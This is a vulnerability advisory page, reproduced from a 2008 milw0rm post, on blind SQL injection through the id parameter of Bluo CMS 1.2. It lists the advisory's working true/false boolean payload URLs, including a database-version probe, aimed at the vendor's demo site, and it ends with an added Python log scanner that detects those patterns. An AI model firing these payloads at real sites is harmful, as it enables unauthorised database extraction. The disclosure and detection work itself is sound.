Vendor: Bluo cms
By: The_5p3ctrum
CVSS: 7.5 (HIGH)
Blind SQL Injection
CWE: Not mentioned
Product Name: Bluo cms
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Platforms Tested: Not mentioned

Bluo cms 1.2 blind sql injection Vulnerability

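Bluo cms 1.2 is vulnerable to blind SQL injection through the id parameter of index.php. A condition appended to the parameter is evaluated by the database, and the page behaves differently depending on whether the condition is true or false. An attacker can use that difference to extract sensitive information from the database by injecting malicious SQL queries.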

Mitigation:

The vendor has not provided any mitigation or remediation for this vulnerability. It is recommended to update to a newer version of the CMS or switch to a different CMS that does not have this vulnerability.
Source

Exploit-DB raw data:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                                                     +
        Bluo cms 1.2  blind sql injection Vulnerability              +
                                                                     +
Discovered by : The_5p3ctrum                                         +
Contact AUTHOR: sp3[at]linuxmail.org & 5p[at]linuxmail.org           +
                                                                     +
                      Mor0ccan Nightmares                            +
                                                                     +
                                                                     +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#####################################################

APPLICATION    : bluocms
DOWNLOAD(299 $): http://www.bluocms.com/shop.php
VENDOR         : http://www.bluocms.com
DEMO           : http://www.bluocms.com/demo

#####################################################


[+] vuln    : blind sql injection
              

[+] Exploit : 
              true:
               
              http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=5
              http://www.bluocms.com/demo/index.php?id=511 and 1=1
              
              false:
              
              http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=4
              http://www.bluocms.com/demo/index.php?id=511 and 1=2

##########################################################################################################
                                                                                                         #
# Greetings: str0ke, BayHay, Cyber-Zone, Drackanz, The_leo, The_Casper, Fucker_Net, And All my friends   #
                                                                                                         #
##########################################################################################################

# milw0rm.com [2008-11-28]
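
Added example (not part of the original advisory and not Bluo cms code): a Python check that scans web access logs for the true/false request pattern listed above. It assumes id is normally a plain integer, as in id=511, and that true and false conditions return responses of different size; the log lines, IP addresses and sizes are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common log format (documentation IPs, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [28/Nov/2008:10:00:01 +0000] "GET /demo/index.php?id=511 HTTP/1.1" 200 5120
203.0.113.9 - - [28/Nov/2008:10:00:05 +0000] "GET /demo/index.php?id=511%20and%201=1 HTTP/1.1" 200 5120
203.0.113.9 - - [28/Nov/2008:10:00:06 +0000] "GET /demo/index.php?id=511%20and%201=2 HTTP/1.1" 200 812
203.0.113.9 - - [28/Nov/2008:10:00:09 +0000] "GET /demo/index.php?id=511+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
198.51.100.7 - - [28/Nov/2008:10:00:12 +0000] "GET /demo/index.php?id=12 HTTP/1.1" 200 4300
"""

LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')
BOOLEAN = re.compile(r"\b(?:and|or)\b.+?(?:=|<|>|\blike\b)", re.I)
FINGERPRINT = re.compile(r"@@version|\bsubstring\s*\(|\bversion\s*\(", re.I)

def classify(value):
    """Return reasons why an id value is not the plain integer the page expects."""
    if re.fullmatch(r"[0-9]+", value):
        return []
    reasons = ["non-numeric id"]
    if BOOLEAN.search(value):
        reasons.append("boolean condition")
    if FINGERPRINT.search(value):
        reasons.append("version fingerprint")
    return reasons

def scan(log_text):
    """Group suspicious id values per client; differing sizes suggest a true/false oracle."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        # parse_qs URL-decodes the value, so %20 and + both become spaces.
        for value in parse_qs(urlsplit(target).query).get("id", []):
            reasons = classify(value)
            if reasons:
                hits[client].append((value, int(size), reasons))
    return {
        c: {"requests": reqs, "oracle_suspected": len({s for _, s, _ in reqs}) > 1}
        for c, reqs in hits.items()
    }

if __name__ == "__main__":
    for client, info in scan(SAMPLE_LOG).items():
        print(client, info)
```

The same integer-only rule that classify() applies to id is what the application would need to enforce, together with a parameterized query, before the value reaches the database.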